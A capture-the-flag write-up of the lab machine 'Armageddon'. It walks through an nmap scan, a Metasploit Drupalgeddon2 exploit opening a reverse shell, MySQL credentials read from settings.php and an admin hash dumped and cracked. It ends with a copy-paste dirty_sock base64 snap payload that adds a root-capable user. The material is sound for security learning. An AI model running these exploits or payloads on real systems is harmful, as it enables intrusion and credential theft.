Armageddon Writeup

 Armageddon Writeup




Nmap

 

 PORT  STATE SERVICE VERSION  
 22/tcp open ssh   OpenSSH 7.4 (protocol 2.0)  
 | ssh-hostkey:   
 |  2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)  
 |  256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)  
 |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)  
 80/tcp open http  Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)  
 |_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D  
 |_http-generator: Drupal 7 (http://drupal.org)  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 | http-robots.txt: 36 disallowed entries (15 shown)  
 | /includes/ /misc/ /modules/ /profiles/ /scripts/   
 | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt   
 | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt   
 |_/LICENSE.txt /MAINTAINERS.txt  
 |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16  
 |_http-title: Welcome to Armageddon | Armageddon  
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  

 PORT 80: http

 PORT 22: ssh

lots of robots.txt files are there its time to enum 

ENUMERATION

port 80

next, grab robots.txt lots of hidden files are there enum it, but first we check wappalyzer to check the whats type of cms its using


cms identification


This machine using 'drupal 7' cms i think 7 is version number? yep...

and OS is CentOS


After some google got lots of exploit  metasploit also there

GET INITIAL SHELL

           

 msfconsole -q  
 msf6 > use exploit/unix/webapp/drupal_drupalgeddon2  
 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233  
 RHOSTS => 10.10.10.233  
 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.58  
 LHOST => 10.10.14.58  
 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options  
 Module options (exploit/unix/webapp/drupal_drupalgeddon2):  
   Name     Current Setting Required Description  
   ----     --------------- -------- -----------  
   DUMP_OUTPUT false      no    Dump payload command output  
   PHP_FUNC   passthru     yes    PHP function to execute  
   Proxies            no    A proxy chain of format type:host:port[,type:host:port][...]  
   RHOSTS    10.10.10.233   yes    The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'  
   RPORT    80        yes    The target port (TCP)  
   SSL     false      no    Negotiate SSL/TLS for outgoing connections  
   TARGETURI  /        yes    Path to Drupal install  
   VHOST             no    HTTP server virtual host  
 Payload options (php/meterpreter/reverse_tcp):  
   Name  Current Setting Required Description  
   ----  --------------- -------- -----------  
   LHOST 10.10.14.58   yes    The listen address (an interface may be specified)  
   LPORT 4444       yes    The listen port  
 Exploit target:  
   Id Name  
   -- ----  
   0  Automatic (PHP In-Memory)  
 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run  
 [*] Started reverse TCP handler on 10.10.14.58:4444   
 i[*] Sending stage (39282 bytes) to 10.10.10.233  by
 [*] Meterpreter session 1 opened (10.10.14.58:4444 -> 10.10.10.233:60416) at 2021-03-28 12:10:11 +0530  

 


some  enumertion

cd sites/


 bash-4.2$ cd sites  
 bash-4.2$ ls  
 README.txt  
 all  
 default  
 example.sites.php  
 bash-4.2$ cd default  
 bash-4.2$ ls  
 default.settings.php  
 files  
 settings.php  
 bash-4.2$ cat settings.php  

 

 

mysql creds


credentials for mysql

username ----- drupaluser

password ------- CQHEy@9M*m23gBVj


login mysql via drupal user


 mysql -u drupaluser -h localhost -pCQHEy@9M*m23gBVj  
 use drupal;  
 select * from users;  
 show;  

 

 


we got admin username and password hash

username ---- brucetherealadmin

hash  ----- $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt


Crack the hash via john


iam already cracked so iam used show option 


Password for this hash is 'booboo'


lets try ssh login


USER.TXT


user.txt


ROOT.TXT


(root) NOPASSWD: /usr/bin/snap install *


its vulnerable/misconfiguration to dirty-sock :)

here is the explanation of dirty-sock 

https://initblog.com/2019/dirty-sock/

 

Simple steps to root

 

copy paste this command

 python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > root.snap  

 

save at root.snap


 and run this command to pwn:)


 

 sudo /usr/bin/snap install --devmode root.snap  
 su dirty_sock  
  passwd : dirty_sock  
   
 and   
   
 sudo -s  
 passwor:dirty_sock  
   
   
 we are root  

 some times machine be slow, exploit not working some times  then relogin  via ssh then try


Root.txt



 [root@armageddon brucetherealadmin]# id&&hostname  

 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023  

 armageddon.htb  

 [root@armageddon brucetherealadmin]# cat /root/root.txt  

 03a85b8d31d8d829139001ad97e668cb  

 [root@armageddon brucetherealadmin]#  

Post a Comment

أحدث أقدم

Smartphones

Post ADS 1

Advertisement

Post ADS 1